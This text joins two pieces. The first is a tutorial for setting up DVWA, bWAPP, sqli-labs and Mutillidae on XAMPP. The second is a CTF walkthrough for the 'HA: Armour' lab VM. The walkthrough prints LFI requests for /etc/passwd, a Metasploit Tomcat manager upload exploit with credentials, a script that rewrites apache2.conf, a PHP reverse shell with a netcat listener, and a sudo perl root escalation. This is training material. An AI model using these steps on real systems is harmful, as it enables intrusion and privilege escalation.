Web Application Lab Setup on Windows


Hello friends! Today we are going to show you how to set up a vulnerable web application server on a Windows system using XAMPP. We will configure the most popular deliberately vulnerable web applications (DVWA, bWAPP, SQLi labs and Mutillidae). So, let's do that.
Table of Content
Requirement
·        Web application
·        XAMPP Server Installation in Windows
·        DVWA
·        bWAPP
·        SQLi
·        Mutillidae

Requirement: XAMPP server (Windows x64)
Web Application
A web application is a program that runs on a web server and is used through a web browser over a network such as the Internet. Web applications range from large enterprise systems to small single-purpose sites; webmail is a common everyday example.
Xampp Server Installation
XAMPP stands for cross-platform (X), Apache, MariaDB, PHP and Perl.
XAMPP is a free and open-source cross-platform web server solution stack package developed by Apache Friends, consisting mainly of the Apache HTTP Server, MariaDB database, and interpreters for scripts written in the PHP and Perl programming languages. Since most actual web server deployments use the same components as XAMPP, it makes transitioning from a local test server to a live server possible. (read more from wikipedia)
Download from here
Once the installation is done, start the Apache and MySQL services from the XAMPP control panel. Keep in mind that the applications below will run with a blank MySQL root password and are vulnerable by design, so run this lab on an isolated network, or bind Apache and MySQL to 127.0.0.1 only.

DVWA
DVWA (Damn Vulnerable Web Application) is a PHP/MySQL web application that is, as the name says, damn vulnerable. Its main goals are to help security professionals test their skills and tools in a legal environment, to help web developers better understand how to secure web applications, and to help teachers and students teach and learn web application security in a classroom setting.
Download from here
Once DVWA has been extracted into htdocs, navigate to C:\xampp\htdocs\dvwa\config\config.inc.php.dist to change the username and password used for the database.

Open the configuration file to set the username and password.

You can see that the default database username is root and the default password is password; we will change the password.
Here we have set the password for the user root to blank (an empty string), because a fresh XAMPP MySQL installation has no root password. Save the settings and quit.
Rename the file to config.inc.php after making the above changes.

Now open DVWA in the browser to create the database:
http://localhost/dvwa/setup.php
Click on Create / Reset Database and the database is created.
Then click on login and the setup is done.
Log in with the default DVWA credentials: username admin and password password.
bWAPP
Now let's set up a new lab, which is bWAPP.
bWAPP, or "buggy web application", is a free, open-source and deliberately insecure web application. It helps security enthusiasts, developers and students discover and prevent web vulnerabilities, and prepares them for penetration testing and ethical hacking projects.
Download it from here.
Now navigate to the C:\xampp\htdocs\bwapp\admin folder and open settings.php to change the default username and password for the database.
You can see that the default username is root and the default password is bug, which we will modify.

Here the username stays root and the password is set to blank. Save the settings and quit.

Now open bwapp/install.php on localhost (http://localhost/bwapp/install.php) and click on "here" to complete the installation.
Now the installation is complete.
Log in as bee:bug (the default bWAPP credentials) and you get the portal to test your penetration testing skills.
Click on "Bugs" and all the vulnerabilities available in bWAPP will be listed.
SQLi
SQLi labs (sqli-labs) is a set of challenges that provides a robust testing environment for learning and practising SQL injection. Let's start. First, download sqli-labs from GitHub and extract it into htdocs.
Now navigate to C:\xampp\htdocs\sqlilabs\sql-connections and edit setup-db.php (in current versions of the repository the credentials live in db-creds.inc in the same folder).


Here we set the password to blank, save the changes and quit.
Now browse to the application at http://localhost/sqlilabs (the folder name you used under htdocs) and click on Setup/reset Databases for labs.
The SQLi lab is now ready to use. The page that opens in your browser lists the different SQLi challenges you can access.
As you can see, we have opened lesson 1. So, we have successfully set up sqli-labs for practice.
Mutillidae
OWASP Mutillidae II is a free, open-source web application that is deliberately vulnerable and built for practising web security. It offers a full test environment covering SQL injection and many other OWASP Top 10 vulnerabilities, is simple to use, and is designed for labs, security enthusiasts, classrooms, CTFs and vulnerability assessment targets.
First, navigate to C:\xampp\htdocs\mutillidae\includes and edit database-config.php as shown below.

Here you can see that the password is set to mutillidae, which we replace with blank.
You can verify that the password is now blank. Save the settings and quit.

Now open the application in your local browser at http://localhost/mutillidae. Mutillidae first shows a notice page; click the opt out link on it.
On the main page you will find a Reset DB option. Click on it to reset the database.
You will be redirected to a page that asks you to click OK to proceed; click OK and the Mutillidae lab is configured.
We have successfully set up all the web applications on the XAMPP server in Windows. In this way we can build a vulnerable web application lab for penetration testing practice.
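Because every application above now runs behind a blank MySQL root password and is vulnerable by design, the one check worth doing before you start is that XAMPP only listens on the loopback interface. The following script is an added example, not part of the original article or of XAMPP: it parses the Listen directives of httpd.conf and the bind-address of my.ini, reports listeners reachable from the LAN, and rewrites exposed Listen lines to 127.0.0.1. The sample configs inside it are constructed; the regexes assume the standard directive syntax.

```python
"""Added example, not part of the original article: audit XAMPP's Apache
httpd.conf and the MariaDB/MySQL my.ini for listeners reachable from the
LAN. The lab applications above run with a blank MySQL root password and
are vulnerable by design, so every service should be bound to loopback.
Assumed: the standard 'Listen' and 'bind-address' directive syntax; the
sample configs below are constructed, not copied from XAMPP."""
import ipaddress
import re

# "Listen 80", "Listen 0.0.0.0:80", "Listen 127.0.0.1:8080", "Listen [::1]:443"
LISTEN = re.compile(r"^([ \t]*)Listen[ \t]+(\S+)", re.M | re.I)
# MariaDB/MySQL: bind-address=127.0.0.1 (optionally quoted) under [mysqld]
BIND = re.compile(r"^[ \t]*bind-address[ \t]*=[ \t]*\"?([^\"\s]+)", re.M | re.I)


def is_loopback(host: str) -> bool:
    """True for localhost, 127.0.0.0/8 and ::1; anything else counts as exposed."""
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # a hostname we cannot resolve offline: treat as exposed
        return False


def parse_listen(value: str) -> tuple:
    """Split a Listen argument into (host, port); a bare port means all interfaces."""
    if value.startswith("["):                       # IPv6 literal: [addr]:port
        host, _, port = value[1:].partition("]:")
        return host, int(port)
    if ":" in value:                                # IPv4 address or hostname with port
        host, port = value.rsplit(":", 1)
        return host, int(port)
    return "0.0.0.0", int(value)                    # "Listen 80" binds everywhere


def exposed_apache_listeners(httpd_conf: str) -> list:
    """Return [(host, port), ...] for every Listen directive not bound to loopback."""
    exposed = []
    for m in LISTEN.finditer(httpd_conf):
        host, port = parse_listen(m.group(2))
        if not is_loopback(host):
            exposed.append((host, port))
    return exposed


def harden_httpd(httpd_conf: str) -> str:
    """Rewrite every exposed Listen directive to 127.0.0.1, keeping its port."""
    def repl(m):
        host, port = parse_listen(m.group(2))
        if is_loopback(host):
            return m.group(0)
        return f"{m.group(1)}Listen 127.0.0.1:{port}"
    return LISTEN.sub(repl, httpd_conf)


def mysql_exposed(my_ini: str) -> bool:
    """True unless bind-address pins MariaDB/MySQL to a loopback address.
    Without the directive the server accepts TCP connections on all interfaces."""
    m = BIND.search(my_ini)
    return m is None or not is_loopback(m.group(1))


# Constructed samples resembling XAMPP's defaults (bare "Listen 80", no bind-address).
SAMPLE_HTTPD = "# constructed excerpt\nListen 80\n#Listen 0.0.0.0:8080\nListen 127.0.0.1:8081\n"
SAMPLE_MY_INI = "[mysqld]\nport=3306\nsocket=\"C:/xampp/mysql/mysql.sock\"\n"

if __name__ == "__main__":
    print("exposed Apache listeners:", exposed_apache_listeners(SAMPLE_HTTPD))
    print("hardened httpd.conf:\n" + harden_httpd(SAMPLE_HTTPD))
    print("MySQL exposed:", mysql_exposed(SAMPLE_MY_INI))
```

Point the functions at the real files (C:\xampp\apache\conf\httpd.conf, the SSL Listen in conf\extra\httpd-ssl.conf, and C:\xampp\mysql\bin\my.ini) and restart the services after editing; the Windows firewall is a second line of defence, not a substitute for binding to loopback.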

HA: Armour Walkthrough


This is our walkthrough for "HA: Armour", a CTF designed by the Hacking Articles Team 😊. We hope you enjoy it.
TASK: Klaw has stolen some armours from the Avengers' Super-Secret Base. Falcon has checked the manifest, and the following items are unaccounted for:
·        HulkBuster Armour
·        Spiderman Armour
·        Ant-Man Armour
·        Black Panther Armour
·        Iron Man Armour
Klaw has hidden all these armours and now it's up to you. Can you use your penetration testing skills to recover them all?
Hint: P.S. Klaw has a habit of dividing his passwords into 3 parts and saving them at different locations. So, if you get some, combine them to move forward.
Level: Intermediate
You can download this lab from here.
Let's begin!!
Penetration Testing Methodologies
Scanning Network
·        Netdiscover
·        Nmap
Enumeration
·        SSH
·        Abusing HTTP
·        TFTP
·        Dirb
·        LFI
Exploiting
·        Abusing Tomcat Manager (Metasploit)
·        Internal Recon
Privilege Escalation
·        Abusing Apache2.conf
·        Abusing sudo rights
Scanning Network
First of all, identify the target on the local network; for this use the following command:
netdiscover

Once you have identified the target IP with the above command, the second step is to scan it. You can use nmap to scan all ports of the target with the following command:
nmap -p- -A 192.168.1.101


Enumeration
From the scan you can see that ports 80, 8009 and 8080 are open for HTTP (Apache HTTP server, Apache JServ/AJP and Apache Tomcat) and port 65534 is open for SSH.
You will find the first armour, "HulkBuster", in the SSH banner when connecting on port 65534, along with the first hint, i.e. the first part of Klaw's password: the Olympics.
ssh 192.168.1.101 -p65534

After getting HulkBuster, it is time to dig out another armour, so open port 80 in a web browser.
Hmmmm! The web page describes the armour collection of Marvel's famous characters, but you need to dig deeper to get a hint.

Ahh!! As you can see from the image below, inside the page source we found three things in an HTML comment: "armour", "69" and "notes.txt".
Let’s check each hint one-by-one and identify what it says.

Assuming 69 could be a port number, we use nmap again to decide whether a service is running on port 69. Since TFTP, the usual occupant of port 69, runs over UDP, we scan the UDP protocol with the following command:
nmap -sU -p69 192.168.1.101
Once you know that port 69 is open for TFTP, connect to it and fetch the file named in the comment. Note that TFTP has no directory listing, so you need to know the file name in advance.
Here you get the notes.txt file mentioned above; download it to your local machine.
tftp 192.168.1.101
get notes.txt

Inside notes.txt you will get the second armour, "Spiderman", and the second hint, maybeevena, which Klaw had hidden there.
At this point you have two armours and two hints. To find the third, we use dirb to brute-force web directories and enumerate all files with the .php extension.
dirb http://192.168.1.101 -X .php
With dirb you find the /file.php page, as shown in the image below.
http://192.168.1.101/file.php
But when you browse /file.php you get a blank white page, and it is worth asking why the author left file.php blank.
If you are familiar with web application vulnerabilities and their testing, you will recognise this pattern: a script that takes a file name and displays nothing by default is a likely candidate for LFI (Local File Inclusion) through a parameter such as file.

So, without wasting time, try to include /etc/passwd through the file parameter, as we did here, which confirms that the page is vulnerable to LFI.
http://192.168.1.101/file.php?file=/etc/passwd

Digging further, inside /etc/apache2/.htpasswd you will find the third armour, "Ant-Man", along with the third hint: StarBucks.
http://192.168.1.101/file.php?file=/etc/apache2/.htpasswd
Now let's recall the hint given by the author:
P.S. Klaw has a habit of dividing his passwords into 3 parts and saving them at different locations. So, if you get some, combine them to move forward.
We have now found all three parts of the password as Hint1, Hint2 and Hint3; let's combine them and see how they help us move ahead.
After combining Hint1, Hint2 and Hint3 you will have the password:
TheOlympicsmaybeevenastarBucks
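Because file.php answers every request with HTTP 200 and an empty body when the include fails, status codes tell you nothing; hits have to be recognised from the content. The script below is an added example, not part of the original walkthrough: it requests a list of well-known files through the suspected parameter, matches each response against a content fingerprint, and pulls the accounts with a real login shell out of /etc/passwd (which is how the user aarti used later in this walkthrough would be enumerated). The target URL, the parameter name, the fake responder and the file contents in FAKE_FS are assumptions and constructed data, so the example runs offline; http_fetch is the real fetcher to swap in against a lab target.

```python
"""Added example, not from the original walkthrough: probe a suspected LFI
parameter for well-known files and recognise hits by content fingerprints,
because file.php answers every request with HTTP 200 and a blank body when
the include fails. The target URL, parameter name and the fake responder
below are assumptions; FAKE_FS holds constructed file contents."""
import re
import urllib.request
from typing import Callable, Dict, List
from urllib.parse import parse_qs, urlsplit

# Regexes that identify a file's contents inside the response body.
FINGERPRINTS = {
    "/etc/passwd": re.compile(r"^root:x:0:0:", re.M),
    "/etc/apache2/.htpasswd": re.compile(r"^[\w.-]+:\$(apr1|2y|2a|2b)\$", re.M),
    "/etc/apache2/apache2.conf": re.compile(r"^\s*ServerRoot\s", re.M),
    "/proc/self/environ": re.compile(r"APACHE_RUN_USER="),
}


def http_fetch(url: str, timeout: float = 5.0) -> str:
    """Real fetcher for use against a live lab target (not exercised offline)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(fetch: Callable[[str], str], base_url: str, param: str = "file") -> Dict[str, str]:
    """Request each candidate path through the parameter and keep the bodies
    whose fingerprint matches. HTTP status codes are ignored on purpose."""
    hits = {}
    for path, pattern in FINGERPRINTS.items():
        body = fetch(f"{base_url}?{param}={path}")
        if body and pattern.search(body):
            hits[path] = body
    return hits


def interactive_users(passwd: str) -> List[str]:
    """Accounts with a real login shell, i.e. candidates for the next pivot."""
    users = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "false", "sync")):
            users.append(fields[0])
    return users


# Constructed stand-in for the vulnerable server: blank page unless the path exists.
FAKE_FS = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
        "aarti:x:1000:1000::/home/aarti:/bin/bash\n"
    ),
    # constructed hash, not the lab's real one
    "/etc/apache2/.htpasswd": "armour:$apr1$CONSTRUCT$zzzzzzzzzzzzzzzzzzzzzz\n",
}


def fake_fetch(url: str) -> str:
    """Mimics file.php: returns the file if the 'file' parameter names one, else ''."""
    query = parse_qs(urlsplit(url).query)
    return FAKE_FS.get(query.get("file", [""])[0], "")


if __name__ == "__main__":
    found = probe(fake_fetch, "http://192.168.1.101/file.php")
    for path in found:
        print("included:", path)
    print("login users:", interactive_users(found.get("/etc/passwd", "")))
```

The fingerprint approach generalises to any LFI where the error path is silent; on the defensive side, the fix for a page like file.php is to map the parameter to a fixed allow-list of file names rather than passing it to include().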
As you know, port 8080 is running Apache Tomcat and its manager application, so maybe we can log in to Tomcat with this password.

Exploiting Tomcat Manager
To log in to the Tomcat manager we use the following credentials:
Username: armour (found above inside the source code comment)
Password: TheOlympicsmaybeevenastarBucks


I hope you are all aware of the Tomcat manager upload exploit available in the Metasploit framework; if not, read the complete article from here.
So, without wasting time, we log in to the Tomcat server with the Metasploit tomcat_mgr_upload module, using the credentials above.
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.1.101
set rport 8080
set httpusername armour
set httppassword TheOlympicsmaybeevenastarBucks
exploit
Booom!! Our favourite meterpreter session is here; let's go for post enumeration.

netstat -antp

If you check the local network statistics for TCP and UDP connections, you will see that something is listening on port 8081 bound to localhost, which nmap could not see from outside. With the help of meterpreter we forward this service to port 8081 on our own machine.

portfwd add -l 8081 -p 8081 -r 127.0.0.1



Once the service is forwarded to your local machine, you can explore it in the web browser as we did here.
http://127.0.0.1:8081
This gives you the fourth armour, "Black-Panther" 😎

Privilege Escalation
This lab is like a rabbit hole where enumeration is the key to identifying loopholes or further hints. Continuing to enumerate, we find that /etc/apache2/apache2.conf and /var/www/html are writable by our current user.

Since apache2.conf is writable, we can edit it to make Apache run as another user and so escalate to that user's privileges.
The machine has a user account named aarti, which we enumerated through /etc/passwd. We set User aarti and Group aarti in /etc/apache2/apache2.conf so that, when the Apache service is restarted, its worker processes (and any PHP they run) execute with aarti's privileges.
So we simply copied the entire content of apache2.conf to our local machine and made the changes described above.
Then we uploaded the modified apache2.conf from our local machine to the target, replacing the original file, as we did here.
Since /var/www/html is writable, we can drop a PHP backdoor into the web root. In parallel we grabbed php-reverse-shell.php from /usr/share/webshells/php on Kali, set the listener IP to ours and saved it as shell.php.
Then we uploaded the shell into /var/www/html so that we can trigger it through the browser.
For Apache to pick up the new User/Group directives the service has to be restarted, so we reboot the machine.
cd /var/www/html
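The edit made to apache2.conf above is the whole privilege escalation: Apache starts as root and drops to whatever User/Group the config names, so a world-writable apache2.conf hands that choice to the attacker. The script below is an added example, not the walkthrough's own steps or any Apache tooling: it resolves the identity Apache would run as (expanding the ${APACHE_RUN_USER} style references Debian uses) and rewrites the directives to the target account, appending them if they were absent. SAMPLE_CONF is a constructed excerpt in Debian's style, not the lab's file.

```python
"""Added example, not part of the original walkthrough: the edit the
attacker makes to a writable apache2.conf, done as code. Apache starts as
root and drops to the account named by the User/Group directives, so
pointing them at 'aarti' makes every PHP request (and therefore shell.php)
run as that user after the next restart. SAMPLE_CONF is a constructed
excerpt in Debian's style; the real file is longer."""
import re
from typing import Dict, Optional, Tuple

# Uncommented User/Group directive at line start; "UserDir" is not matched
# because whitespace must follow the keyword.
DIRECTIVE = re.compile(r"^([ \t]*)(User|Group)[ \t]+(\S+)[ \t]*$", re.M)
ENV_REF = re.compile(r"\$\{(\w+)\}")


def effective_identity(conf: str, env: Optional[Dict[str, str]] = None) -> Tuple[str, str]:
    """Resolve the User/Group Apache will run as; the last directive wins and
    ${VAR} references are expanded from env (Debian sets them in /etc/apache2/envvars)."""
    env = env or {}
    ident = {"User": None, "Group": None}
    for m in DIRECTIVE.finditer(conf):
        ident[m.group(2)] = ENV_REF.sub(lambda e: env.get(e.group(1), e.group(0)), m.group(3))
    return ident["User"], ident["Group"]


def run_as(conf: str, user: str, group: Optional[str] = None) -> str:
    """Return conf with User/Group rewritten to the given account, appending
    the directive if the file did not contain it."""
    group = group or user
    wanted = {"User": user, "Group": group}
    seen = {"User": False, "Group": False}

    def repl(m):
        seen[m.group(2)] = True
        return f"{m.group(1)}{m.group(2)} {wanted[m.group(2)]}"

    patched = DIRECTIVE.sub(repl, conf)
    for name, value in wanted.items():
        if not seen[name]:
            patched = patched.rstrip("\n") + f"\n{name} {value}\n"
    return patched


SAMPLE_CONF = """# constructed excerpt of a Debian-style /etc/apache2/apache2.conf
ServerRoot "/etc/apache2"
PidFile ${APACHE_PID_FILE}
Timeout 300
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
HostnameLookups Off
IncludeOptional conf-enabled/*.conf
"""
ENVVARS = {"APACHE_RUN_USER": "www-data", "APACHE_RUN_GROUP": "www-data"}

if __name__ == "__main__":
    print("before:", effective_identity(SAMPLE_CONF, ENVVARS))
    patched = run_as(SAMPLE_CONF, "aarti")
    print("after: ", effective_identity(patched, ENVVARS))
    # On the target this text is written back over the writable apache2.conf
    # and takes effect only after Apache is restarted (here: a reboot).
```

The same functions double as a defensive check: run effective_identity over a server's config and confirm it resolves to an unprivileged service account, and make sure apache2.conf (and /var/www/html) are owned by root and not writable by that account, which is the misconfiguration this lab exploits.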

After the reboot is complete, we open shell.php in the browser, having first started a netcat listener on Kali.
nc -lvp 1234
http://192.168.1.101/shell.php


After a moment we get a reverse shell on our local machine as user aarti. Now let's check the sudo rights for this user.
sudo -l
Here you can observe that user aarti has the sudo right to run perl as root, which means we can abuse it to escalate to root privileges.
sudo perl -e 'exec "/bin/bash";'
Boom!! We have root shell access; let's find the fifth and final armour. You can find it inside the /root directory in final.txt.
cd /root
cat final.txt
And the final armour is my favourite, "Iron-man" 🤗